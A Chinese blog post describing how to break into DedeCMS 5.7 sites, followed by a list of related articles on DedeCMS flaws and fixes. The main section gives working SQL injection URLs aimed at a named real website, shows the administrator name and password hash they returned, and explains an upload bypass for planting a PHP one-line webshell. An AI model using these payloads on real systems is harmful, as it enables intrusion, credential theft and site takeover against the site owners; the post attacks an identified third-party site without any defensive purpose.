data/mysql_error_trace.inc,织梦CMS5.7注入加上传漏洞

最新推荐文章于 2022-07-12 09:52:40 发布
最新推荐文章于 2022-07-12 09:52:40 发布
阅读量193 收藏
点赞数
文章标签: data/mysql_error_trace.inc

爆路径:data/mysql_error_trace.inc

①注入漏洞。

这站 http://www.30tianlong.com/

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

然后写上语句

查看管理员帐号

http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

admin

查看管理员密码

http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

8d29b1ef9f8c5a5af429

查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

8d2

9b1ef9f8c5a5af42

9

cmd5没解出来 只好测试第二个方法

②上传漏洞:

只要登陆会员中心,然后访问页面链接

http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code][/code]=../dialog/select_soft_post

如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

[php]

file:

newname:

提交

[/php]

即可上传成功

weixin_39763902
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
.Net/C#连接Mysql数据库Connector/Net MySql.Data.dll 8.20.0+6.9.12
05-15
MySQL Connector/Net ...在项目中引用组件:MySql.Data.dll (记得复制到本地中选择为true / 或直接把MySql.Data.dll复制到debug文件夹下) 在代码中 using MySql.Data.MySqlClient; ......接下来这里就看你表演了。
CMS <=5.7 SP2 file_class.php 任意文件上漏洞
zxy840552216的博客
07-03 361
漏洞 DedeCMS <=5.7 SP2 file_class.php 任意文件上漏洞 简介 dedecms v5.7 sp2截至2019年2月19日的版本中对编辑相册文件上校验不严导致可Getshell. 文件 /dede/file_class.php 修复 打开 /dede/file_class.php 找到大概在161行 1 elseif(preg_match("/.(".$fileexp.")/i",$filename)) 改成 .
【文件上漏洞-08】常见编辑器上以及常见的CMS漏洞
m0_64378913的博客
07-12 2200
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上功能,这些编辑器的某些版本也存在文件上漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上漏洞,但是产生文件上漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS
dedecms漏洞修复大全含任意文件上漏洞注入漏洞
zxy840552216的博客
07-12 1297
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天就为大家讲解一下如何修复任意文件上漏洞注入漏洞。任意文件上漏洞修复包含一个文件/include/dialog/select_soft_post.php;SQL注入漏洞包含5个文件/include/filter.inc.php /member/mtypes.php /member/pm.php /plus/guestbook/edit.inc.php /plus/search.php...
cms v6.7最新上漏洞
fengling132的专栏
07-02 770
file: newname: 提交 1,必须登陆用户。 2,将待上PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。 3,newname为上后的新文件名,扩展名使用大写绕过,如“Php”。
CMS注入高危漏洞情况
遥远的星星
09-15 2781
CMS注入高危漏洞情况 作者:     时间:2014-04-17   “CMS是由上海卓卓网络科技有限公司研发的一款网站建站系统软件,又称“DEDE内容管理系统”,在国内应用较为广泛。2014年2月25日,该软件被披露存在一个高危漏洞,由于页面参数未进行严格过滤,存在SQL注入漏洞。受漏洞
mysql_test_c__by_wy.rar_MYSQL_mysql api_mysql c++
09-21
本示例"mysql_test_c__by_wy.rar"旨在演示如何利用MySQL C API进行基本的数据库操作。下面我们将详细探讨MySQL C API的使用方法以及涉及的知识点。 首先,为了连接到MySQL服务器,我们需要包含`mysql.h`头文件,并...
mysql-5.7.44-linux-glibc2.12-x86-64.tar.gz
01-24
./configure --prefix=/usr/local/mysql --with-extra-charsets=complex ``` - **编译与安装**:编译源代码并进行安装。 ``` make && make install ``` 3. **初始化与权限设置** - **初始化MySQL**:运行...
mysql.rar_C 访问mysql_c mysql_c# mysql_mysql 插入
09-24
using MySql.Data.MySqlClient; class Program { static void Main(string[] args) { string connStr = "Server=localhost;Database=database_name;Uid=username;Pwd=password;"; MySqlConnection conn = new ...
mysql启动时报错:Starting MySQL… ERROR! The server quit without updating PID file
12-14
MySQL是世界上最流行的关系型数据库管理系统之一,当遇到“Starting MySQL… ERROR! The server quit without updating PID file”的启动错误时,通常意味着服务器未能成功启动并更新其进程ID(PID)文件,这可能是...
CMS漏洞修复
caichuoran3785的博客
06-27 665
近段时间老是发现网站title被注入其他信息,应该是被植入***还是什么的,非常困闹,在网站找了一些漏洞的修补方法。 任意文件上漏洞修复 一、/include/dialog/select_soft_post.php文件,搜索(大概在72行的样子) $fullfilename = $cfg_basedir.$activepath.'/'.$filename; 修改为 if...
dedecms漏洞uploadsafe.inc.php修复方法
qq_31763129的博客
04-26 2759
 今天分享的漏洞是一个关于dedecms漏洞修复方法,主要是文件/include/uploadsafe.inc.php。      有2个地方:      1、搜索 ${$_key.'_size'} = @filesize($$_key);      }(大概在42,43行左右)      替换成          ${$_key.'_size'} = @filesize($$_key);...
dedecms后台文件任意上漏洞
qq_31763129的博客
07-06 3182
 /dede/media_add.php或者/你的后台名字/media_add.php搜索$fullfilename = $cfg_basedir.$filename;(大概在69行左右)      替换成            if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#...
mysql error trace_DedeCMSdata/mysql_error_trace.inc日志暴露后台地址漏洞修复
weixin_34638282的博客
01-19 298
DedeCMSdata日志mysql_error_trace.inc记录了很多MYSQL错误记录,如果你曾经在后台访问时候出现过MYSQL错误,就会暴露后台地址,因为这个文件文件名固定,很容易被人给扫到漏洞因此可以改名处理。解决办法一:首先用FTP或远程登陆的方式将data/mysql_error_trace.inc更名成 mysql_error_你喜欢的任意字符.inc然后打开 /includ...
data/mysql_error_trace.inc,09-在线挑战详细攻略-《真的很简单》
weixin_32758097的博客
03-12 165
本帖最后由 独狼1927 于 2017-2-22 15:40 编辑image001.png (194.44 KB, 下载次数: 135)2017-2-20 18:00 上Step 0实验环境操作机:Windows XP [172.16.11.2]目标网址:www.test.ichunqiu[172.16.12.2]实验工具:中国菜刀实验目标:获取www.test.ichunqiu网站的FLA...
mysql error trace_防止DedeCMS错误警告日志data/mysql_error_trace.inc暴露后台管理地址
weixin_39907713的博客
01-19 154
防止DedeCMS错误警告日志data/mysql_error_trace.inc暴露后台管理地址,请使用FTP或远程登陆服务器下载或打开你网站下的 data/mysql_error_trace.inc 文件。用记事本查看此文件,此文件为DedeCms错误警告记录mysql查询错误,如果有后台查询出现错误,则会暴露后台路径。广信之家具体操作教程:第一步、更改dedesql.class.php文件内...
批量修复dede mysql_err漏洞
iteye_16035的博客
03-08 529
本来想用查找替换,但是符号太麻烦了。考虑到文件都是一样的,只好先修改一个,然后替换就行了。 find ./webfiles -name "dedesql.class.php" -print -exec cp -f ./dedesql.class.php {} \; -------------------------------- 漏洞测试: 1、http://xxx...
MYSQL— perror 错误码详情
热门推荐
道行尚浅(老道)的博客
12-04 11万+
[root@localhost ~]# cat test_nothread.py import paramiko import threading import os def ssh2(ip,username,passwd,cmd): file_path='/root/perror.log' logfile=file(file_path,'a') try:
data/mysql_error_trace.inc_DedeCMS多个漏洞exp汇总,以备后用
weixin_33037089的博客
02-06 306
爆路径:data/mysql_error_trace.inc一、dedecms plus/search.php注入漏洞修复及利用0×1:http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[uNion]=a报错如果为:Safe Alert: Request Error step 2 !则利用以下exp:http://www....
cms手机页怎么生成
最新发布
02-01
要生成CMS的手机页,需要进行以下步骤: 1. 安装CMS模板:首先,确保你的CMS系统已经安装好,并且你已经选择了一个适用于手机页的模板。将该模板上至网站的templets目录下。 2. 创建手机页模板:进入CMS的后台管理界面,点击“模板”菜单,然后选择“管理模板”。点击“新增”按钮,然后输入模板名称,如“手机页模板”。点击“确定”按钮创建模板。 3. 设计手机页模板:在模板管理界面,找到刚才创建的手机页模板,并点击“编辑”按钮。在模板编辑界面,通过HTML、CSS和JavaScript来设计你想要的手机页布局和样式。 4. 生成手机页:完成设计后,点击手机页模板编辑界面的“生成手机页”按钮。系统将自动生成手机页,并保存到网站的templets目录下的m目录中。 5. 配置手机页:点击“系统”菜单,然后选择“手机”,再点击“自定义静态手机页”按钮。在弹出的界面中,选择生成的手机页模板和对应的栏目。点击“确定”按钮保存配置。 6. 查看手机页:在手机浏览器中输入你的网站地址,系统将自动识别设备类型,如果是手机设备,将会显示生成的手机页。 请注意,以上步骤仅针对CMS系统中自带的手机页生成功能。如果你想要更加个性化的手机页,你可以通过第三方插件或自定义开发来实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值